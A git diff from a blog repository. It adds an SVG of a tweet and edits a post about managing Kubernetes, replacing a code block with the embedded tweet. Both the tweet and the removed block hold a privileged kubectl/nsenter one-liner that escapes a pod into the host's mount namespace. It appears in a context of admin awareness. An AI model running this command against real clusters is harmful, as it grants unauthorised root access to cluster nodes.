diff --git a/src/images/tweets/1545065196561080321.svg b/src/images/tweets/1545065196561080321.svg new file mode 100644 index 0000000..5469ca2 --- /dev/null +++ b/src/images/tweets/1545065196561080321.svg @@ -0,0 +1 @@ +

Ian Coldwater 📦💥

@IanColdwater

kubectl run h0nk --rm -it --image alpine --privileged --overrides '{"spec":{"hostPID": true}}' --command nsenter -- --mount=/proc/1/ns/mnt

new and improved version of @mauilion and my offensive K8s one-liner! tagging him in because he can't cotweet yet

diff --git a/src/posts/2022-07-04-managing-kubernetes-without-loosing-your-cool.md b/src/posts/2022-07-04-managing-kubernetes-without-loosing-your-cool.md index 5159faa..1b9f97f 100644 --- a/src/posts/2022-07-04-managing-kubernetes-without-loosing-your-cool.md +++ b/src/posts/2022-07-04-managing-kubernetes-without-loosing-your-cool.md @@ -239,11 +239,9 @@ Shortly after I posted this blog post, [Ian Coldwater](https://twitter.com/IanCo
-``` -kubectl run h0nk --rm -it --image alpine --privileged --overrides '{"spec":{"hostPID": true}}' --command nsenter -- --mount=/proc/1/ns/mnt -- /bin/bash -``` +[![](/images/tweets/1545065196561080321.svg)](https://twitter.com/IanColdwater/status/1545065196561080321) -
Timely Tweet by Ian Colwater (no longer available)
+
Timely Tweet by Ian Colwater
## #8 - Admission Webhooks